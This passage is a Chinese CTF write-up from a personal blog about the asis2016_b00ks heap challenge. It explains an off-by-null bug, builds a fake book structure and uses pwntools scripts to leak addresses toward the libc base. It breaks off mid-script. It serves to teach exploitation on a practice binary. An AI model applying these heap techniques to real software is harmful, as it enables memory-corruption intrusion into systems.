<!doctype html>
<head>
  <meta charset="utf-8">
  <meta name="description" content="&lt;h2 id=&#34;逆向分析&#34;&gt;&lt;a href=&#34;#逆向分析&#34; class=&#34;headerlink&#34; title=&#34;逆向分析&#34;&gt;&lt;/a&gt;逆向分析&lt;/h2&gt;&lt;p&gt;&lt;img src=&#34;https://img-blog.csdnimg.cn/20201129194248447.png&#34; alt=&#34;img&#34;&gt;&lt;/p&gt;
&lt;p&gt;一进来我们就很容易发现，这也是堆题中最为常见的菜单题目。&lt;/p&gt;
&lt;p&gt;简单分析一下，">
  <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, user-scalable=yes">
  <title>asis2016_b00ks | powercat</title>

  <link rel="stylesheet" id="chosen-theme" href="https://rawgit.com/fiatjaf/classless/master/themes/plain/theme.css">
  <script>
let link = document.getElementById('chosen-theme')
let widget = document.createElement('div')
widget.style.position = 'absolute'
widget.style.right = '5px'
widget.style.top = '2px'
widget.style.background = 'beige'
widget.style.color = '#444'
widget.style.zIndex = 99
widget.style.padding = '4px 8px'
widget.innerHTML = `
<label>
  <p>No theme was set on <code>theme_config</code>.<br>
     Choose a theme from the list to experiment with it:</p>
  <select></select>
</label>
`
fetch('https://api.github.com/repos/fiatjaf/classless/contents/themes')
  .then(r => r.json())
  .then(files => {
    document.body.appendChild(widget)
    let select = document.querySelector('select')
    files
      .filter(f => f.type === 'dir')
      .forEach(f => {
        let option = document.createElement('option')
        option.value = f.name
        option.innerHTML = f.name
        select.appendChild(option)
      })
    let options = Array.from(select.querySelectorAll('option'))
    let chosen = options[parseInt(Math.random() * options.length)]
    chosen.selected = true
    link.href = link.href.replace(/themes\/[^\/]+/, `themes/${chosen.value}`)
    select.addEventListener('change', e => {
      let chosen = e.target.value
      link.href = link.href.replace(/themes\/[^\/]+/, `themes/${chosen}`)
    })
  })
  .catch(console.log)
  </script>

<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <header role="banner">
      <a href="/">
        
          <img src="https://picsum.photos/640/480">
        
      </a>  
    <h1>
      <a href="/">powercat</a>
    </h1>
    <aside>
      <p></p>
    </aside>
  </header>
  
  <main>
    <article>
  <header>
  
  <h1><a href="http://example.com/2022/01/16/obn/">asis2016_b00ks</a></h1>
  <aside>
    
    <time datetime="222022-01-16">
      January 16th 2022
    </time>
    
    <ul>
    
      <li><a href="/tags/writeup/">writeup</a></li>
    
    </ul>
  </aside>
</header>

  <div><h2 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h2><p><img src="https://img-blog.csdnimg.cn/20201129194248447.png" alt="img"></p>
<p>一进来我们就很容易发现，这也是堆题中最为常见的菜单题目。</p>
<p>简单分析一下，打开程序，最先产生交互的函数时sub_B6D。</p>
<p><img src="https://img-blog.csdnimg.cn/20201129194727591.png" alt="img"></p>
<h3 id="漏洞点sub-B6D"><a href="#漏洞点sub-B6D" class="headerlink" title="漏洞点sub_B6D"></a>漏洞点sub_B6D</h3><p>调用了sub_9F5函数，是作者自己写的read函数，进去看看。</p>
<p><img src="https://img-blog.csdnimg.cn/2020112920025945.png" alt="在这里插入图片描述"></p>
<p>注意这里的判定：先++buf，然后判定是否达到了最大长度(32字符)，如果达到了，就跳出循环，然后把当前的buf的字符变为\x00。</p>
<p>咋一看没什么问题，但是仔细一想，它这里的i是从0开始，当i&#x3D;&#x3D;a2的时候其实已经读了33个字符了，也就是说如果我们刚好输入32个字符后，它再读一个字符，并且会把这个字符变为\x00。</p>
<p>比如我们输入了‘A’*32，实际上数据流中我输入的是‘AAAA….AAA\n’，当我们输入第32个A被读取之后先检测是否为‘\n’，通过，++buf，然后比对i是否等于a2，但是由于i从0开始，此时i为31，所以也通过，继续循环。</p>
<p>然后此时读取的字符是\n，检测到*buf &#x3D;&#x3D; ‘\n’ 所以执行break，再把’\n’覆盖为\x00。导致最终读入的字符为32个’A’+一个’\x00’。</p>
<p>先简单写个脚本测试一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">init</span>():</span><br><span class="line">    p.recvline()</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create</span>(<span class="params">name_size, name, desc_size, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(name_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(desc_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">change_author</span>(<span class="params">author</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(author)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">init()</span><br><span class="line">debug()</span><br><span class="line">create(<span class="number">0x20</span>,<span class="string">&#x27;aaaaaaaa&#x27;</span>,<span class="number">0x20</span>,<span class="string">&#x27;bbbbbbbb&#x27;</span>)</span><br><span class="line">debug()</span><br><span class="line">change_author(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">debug()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>init()先将作者名设置为32个A，然后create新建一个book（因为id是1，所以咱们叫他book1），然后再change_author修改作者名，看看内存里会有什么样的变化。</p>
<p>init()执行过后<img src="https://img-blog.csdnimg.cn/2020120117002334.png" alt="在这里插入图片描述"></p>
<p>可以看到在内存里写入了32个41</p>
<p>create()执行过后</p>
<p><img src="https://img-blog.csdnimg.cn/20201201170301276.png" alt="在这里插入图片描述"></p>
<p>可以看到在32个A后出现了一个指针，指针指向b00k1的id</p>
<p><img src="https://img-blog.csdnimg.cn/20201201170429659.png" alt="在这里插入图片描述"></p>
<p>change_author()执行过后<img src="https://img-blog.csdnimg.cn/20201201213343427.png" alt="在这里插入图片描述"></p>
<p>可以发现原来指向book1的ID的指针后两位被覆盖为了00。<br> 如何利用这个漏洞？<br> 思路：在覆盖为00后的地址位置（如这里的0x56285dc0f300），写一个伪造的book，怎么写，如何利用这个伪造的book我们之后再分析。</p>
<h3 id="结构体分析"><a href="#结构体分析" class="headerlink" title="结构体分析"></a>结构体分析</h3><p>在利用漏洞之前，我们分析一下这个程序所用到的结构体。</p>
<p>在create book对应函数里面可以找到这样一段代码<img src="https://img-blog.csdnimg.cn/20201202140253733.png" alt="在这里插入图片描述"></p>
<p>这一块就很明显的反映出这个程序所用的结构体的结构。</p>
<p>先看这个*((_QWORD *)off_202010 + v2) &#x3D; v3;</p>
<p>这个off_202010在之前用到过类似的地址：<img src="https://img-blog.csdnimg.cn/20201202140501120.png" alt="img"></p>
<p>对就是之前创建作者名的时候。</p>
<p>ps.这里的sub_9F5和之前的sub_B6D是同一个函数，因为我写这篇文章不是一次性写完的，中间关了一次IDA。不过这都不重要。</p>
<p>跳转ida看一下</p>
<p><img src="https://img-blog.csdnimg.cn/20201202140609749.png" alt="在这里插入图片描述"></p>
<p>我们可以看到，作者名的其实地址off_202018在0x202040，而create中调用的这个地址在0x202060，刚好相差了0x20，再回头看一下之前create()函数执行过后的内存图：<img src="https://img-blog.csdnimg.cn/20201202141014785.png" alt="在这里插入图片描述"></p>
<p>现在我们可以理解，前面两行(0x20)的41(‘A’)之后跟的那个地址，就是book1的起始地址。<br> 然后再回到IDA看另外的四行，翻译过来的结构体就大概长这样：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">book_struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line"><span class="type">int</span> id;</span><br><span class="line"><span class="type">void</span> *book_name;</span><br><span class="line"><span class="type">void</span> *book_description;</span><br><span class="line"><span class="type">int</span> description_size;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>id对应了unk_202024，随着书的数量增加而自增。<br> *bookname可以通过之前的代码推断：<img src="https://img-blog.csdnimg.cn/20201202141522668.png" alt="在这里插入图片描述"></p>
<p>*book_description和description_size也是类似：<img src="https://img-blog.csdnimg.cn/20201202141637393.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20201202141657947.png" alt="在这里插入图片描述"></p>
<h2 id="漏洞利用：Edit"><a href="#漏洞利用：Edit" class="headerlink" title="漏洞利用：Edit()"></a>漏洞利用：Edit()</h2><p><img src="https://img-blog.csdnimg.cn/20201202135034999.png" alt="在这里插入图片描述"></p>
<p>看到菜单的选项3是Edit a book，转到函数界面看看：<img src="https://img-blog.csdnimg.cn/20201202135115976.png" alt="在这里插入图片描述"></p>
<p>可以看到这边又调用了读函数sub_9F5，将读取的内容写到book结构体基地址+16（0x10）处的指针所指向的位置。<img src="https://img-blog.csdnimg.cn/20201202143838146.png" alt="在这里插入图片描述"></p>
<p>也就是：<br> 图中这个地址所指向的地方<br> 我们跳转过去看看</p>
<p><img src="https://img-blog.csdnimg.cn/20201202144024131.png" alt="在这里插入图片描述"></p>
<p>在这里就看到我之前测试所写的’aaaaaaaa’’a’&#x3D;62<br>也就是说如果我们控制了这里的0x000056285dc0f2e0，就可以在任意的地方写任意的东西了。<br>另外在菜单的4选项还有print book detail的选项，也就是说如果我们控制了这个description指针的地址，就可以做到任意地址读写。<br>具体怎么实现再往后看。</p>
<h3 id="fakebook的构造和利用"><a href="#fakebook的构造和利用" class="headerlink" title="fakebook的构造和利用"></a>fakebook的构造和利用</h3><p>就像历史上国与国之间的侵略一样，想要获得一个内鬼，就得先培养一个内鬼，然后再让这个内鬼得到他们内部的信任（权限）<br> 那我们先来构造一个内鬼</p>
<h4 id="构造fakebook"><a href="#构造fakebook" class="headerlink" title="构造fakebook"></a>构造fakebook</h4><p>这个很简单，只要这样就可以：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">init()</span><br><span class="line">create(<span class="number">0x20</span>,<span class="string">&#x27;aaaaaaaa&#x27;</span>,<span class="number">0x20</span>,<span class="string">&#x27;bbbbbbbb&#x27;</span>)</span><br><span class="line">edit(<span class="number">1</span>,p64(<span class="number">1</span>) + p64(<span class="number">0x114514</span>) + p64(<span class="number">0x114514</span>) + p64(<span class="number">0xffffff</span>))</span><br><span class="line">debug()</span><br><span class="line">change_author(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">debug()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>运行一下看看是不是这么回事：<img src="https://img-blog.csdnimg.cn/20201202145954216.png" alt="在这里插入图片描述"></p>
<p>当当！我们的内鬼已经培养完了，这个内鬼可以在0x114514这个地址写0xffffff大小的内容，是不是很猛？<br> 但是！别忘记一个很关键的事情，<img src="https://img-blog.csdnimg.cn/20201202150113817.png" alt="在这里插入图片描述"></p>
<p>程序它不认我这个内鬼啊！只要这里book1的指针还是指向0x56157f41c310，我们往book1的description写东西就还是往0x56157f41c2e0写，那怎么办呢？</p>
<p>这时候就想到了之前我们提到的off-by-null漏洞了，我们只要再填写一次作者名（就是前面的一堆4141），就会溢出一个\x00，覆盖掉0x56157f41c310后面的10。</p>
<p>乍一看这仿佛是不可控的，只能把后面两个改成00，但是我们的内鬼在0x56157f41c2e0，要怎么把book1的指针指向我们的内鬼呢？</p>
<p>其实name，description，book1他们三个是轮流划分区域的。<img src="https://img-blog.csdnimg.cn/20201202154841219.png" alt="在这里插入图片描述"></p>
<p>我们这里用刚好一本书的description大小0x20（chunk大小是0x30），那么如果book1的地址是以0xXXXXXX30结尾，那么用\x00覆盖以后，就变成0xXXXXXX00，由于book1的chunk刚好紧接着description的chunk，所以此时的0xXXXXXX00就刚好是description的地址。<br>那现在问题就在于如何把book1的结尾变成0x30？<br>只要不断扩大name的size直到book1的地址变为0x30结尾即可。</p>
<h4 id="使fakebook取代book1"><a href="#使fakebook取代book1" class="headerlink" title="使fakebook取代book1"></a>使fakebook取代book1</h4><p><img src="https://img-blog.csdnimg.cn/20201202155450295.png" alt="在这里插入图片描述"></p>
<p>先看一下当前name是0x20，description也是0x20的时候，堆的结构是这样的：<img src="https://img-blog.csdnimg.cn/20201202155936216.png" alt="在这里插入图片描述"></p>
<p>可以看到如果要让book1基地址变成0x30的话 需要<img src="https://img-blog.csdnimg.cn/202012021601410.png" alt="在这里插入图片描述"></p>
<p>往下挤0x20<br> 所以咱们把name加0x20，再试试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">init</span>():</span><br><span class="line">    p.recvline()</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create</span>(<span class="params">name_size, name, desc_size, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(name_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(desc_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">change_author</span>(<span class="params">author</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(author)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">book_id, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(book_id))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">init()</span><br><span class="line">create(<span class="number">0x20</span> + <span class="number">0x20</span>,<span class="string">&#x27;aaaaaaaa&#x27;</span>,<span class="number">0x20</span>,<span class="string">&#x27;bbbbbbbb&#x27;</span>)</span><br><span class="line">p.interactive()</span><br><span class="line">edit(<span class="number">1</span>,p64(<span class="number">1</span>) + p64(<span class="number">0x114514</span>) + p64(<span class="number">0x114514</span>) + p64(<span class="number">0xffffff</span>))</span><br><span class="line">debug()</span><br><span class="line">change_author(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">debug()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>现在脚本长这样，看看啥效果<img src="https://img-blog.csdnimg.cn/20201202160834428.png" alt="在这里插入图片描述"></p>
<p>很好，book1已经如我们所愿变成30结尾了<br> 执行到下一个debug()</p>
<p><img src="https://img-blog.csdnimg.cn/20201202160944927.png" alt="在这里插入图片描述"></p>
<p>到这一步，内鬼已经写好。继续执行<img src="https://img-blog.csdnimg.cn/20201202161038931.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20201202161126931.png" alt="在这里插入图片描述"></p>
<p>到此，我们已经成功完成了扶植内鬼，和任命内鬼的全过程。<br> 测试一下<img src="https://img-blog.csdnimg.cn/20201202161248347.png" alt="在这里插入图片描述"></p>
<p>我尝试输出了一下书的细节，程序直接崩溃了，如我所料。<br> 如果没有任命成功，它会照常输出：<img src="https://img-blog.csdnimg.cn/20201202161401281.png" alt="在这里插入图片描述"></p>
<p>之所以这里会崩溃，是因为程序找不到0x114514这个地址。<br> 也就证明我们的内鬼计划非常成功。</p>
<h3 id="获取libc基地址，执行shell"><a href="#获取libc基地址，执行shell" class="headerlink" title="获取libc基地址，执行shell"></a>获取libc基地址，执行shell</h3><h4 id="获取libc基地址"><a href="#获取libc基地址" class="headerlink" title="获取libc基地址"></a>获取libc基地址</h4><p>当程序需要分配一块较小的空间时，malloc会默认使用brk方式分配chunk，但是如果需要分配的空间很大的话，会使用mmap方式分配。而使用mmap方式分配的chunk有个特点，就是chunk地址与libc基地址之间的偏移量是固定的（即使开了PIE:libc地址随机）</p>
<p>这就 给我们提供了一个很好的获取libc的方式。</p>
<p>地址获取思路：</p>
<p>1、将作者名填满32个字节，由于print输出到\x00停止的特性，输出作者名时尾部会输出book1的地址（如上图的Author尾部的不可见字符）</p>
<p>2、通过book1地址计算出book2的description地址(也可以是NAME地址)</p>
<p>3、将fakebook的description指针所指向的地址修改为book2的description所在的内存地址(不是指向的地址)；</p>
<p>4、通过菜单选项Print book detail泄露book2的description所指向的地址；</p>
<p>5、在本地调试，使用vmmap得到book2地址与libc基地址偏移量；</p>
<p>6、通过book2的descrtption地址算出libc基地址。</p>
<p>下面开始时间</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">init</span>():</span><br><span class="line">    p.recvline()</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create</span>(<span class="params">name_size, name, desc_size, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(name_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(desc_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">book_id</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(book_id))</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">book_id, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(book_id))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">printf</span>():</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">change_author</span>(<span class="params">author</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(author)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">init()</span><br><span class="line">book1_name = <span class="number">0x40</span></span><br><span class="line">book1_des = <span class="number">0x20</span></span><br><span class="line">create(book1_name, <span class="string">&#x27;a&#x27;</span>, book1_des, <span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">create(<span class="number">0x21000</span>, <span class="string">&#x27;c&#x27;</span>, <span class="number">0x21000</span>, <span class="string">&#x27;d&#x27;</span>)</span><br><span class="line">printf()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ID: 1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">book1_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;book1_addr:&quot;</span>+<span class="built_in">hex</span>(book1_addr))</span><br><span class="line">edit(<span class="number">1</span>, p64(<span class="number">1</span>)+p64(book1_addr+<span class="number">0x38</span>)+p64(book1_addr+<span class="number">0x38</span>)+p64(<span class="number">0xffff</span>))</span><br><span class="line">change_author(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">printf()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ID: 1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Name: &#x27;</span>)</span><br><span class="line">book2_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;book2_addr:&quot;</span>+<span class="built_in">hex</span>(book2_addr))</span><br><span class="line">debug()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>先看看book2的地址是多少：<img src="https://img-blog.csdnimg.cn/20201202183030997.png" alt="在这里插入图片描述"></p>
<p>可以看到这边跑出了book2的地址<br> 然后vmmap看一下libc基地址是多少<img src="https://img-blog.csdnimg.cn/20201202183112135.png" alt="在这里插入图片描述"></p>
<p>这里libc-2.31.so就是libc了，第一行的起始地址就是libc的基地址。<br>所以它的偏移量就是：0x7f83dba36000 - 0x7f83dba14010<br>所以libc基地址 &#x3D; book2_addr + (0x7f83dba36000 - 0x7f83dba14010)<br>修改后的脚本（自定义函数部分略过了）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">init()</span><br><span class="line">book1_name = <span class="number">0x40</span></span><br><span class="line">book1_des = <span class="number">0x20</span></span><br><span class="line">create(book1_name, <span class="string">&#x27;a&#x27;</span>, book1_des, <span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">create(<span class="number">0x21000</span>, <span class="string">&#x27;c&#x27;</span>, <span class="number">0x21000</span>, <span class="string">&#x27;d&#x27;</span>)</span><br><span class="line">printf()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ID: 1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">book1_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;book1_addr:&quot;</span>+<span class="built_in">hex</span>(book1_addr))</span><br><span class="line">edit(<span class="number">1</span>, p64(<span class="number">1</span>)+p64(book1_addr+<span class="number">0x38</span>)+p64(book1_addr+<span class="number">0x38</span>)+p64(<span class="number">0xffff</span>))</span><br><span class="line">change_author(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">printf()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ID: 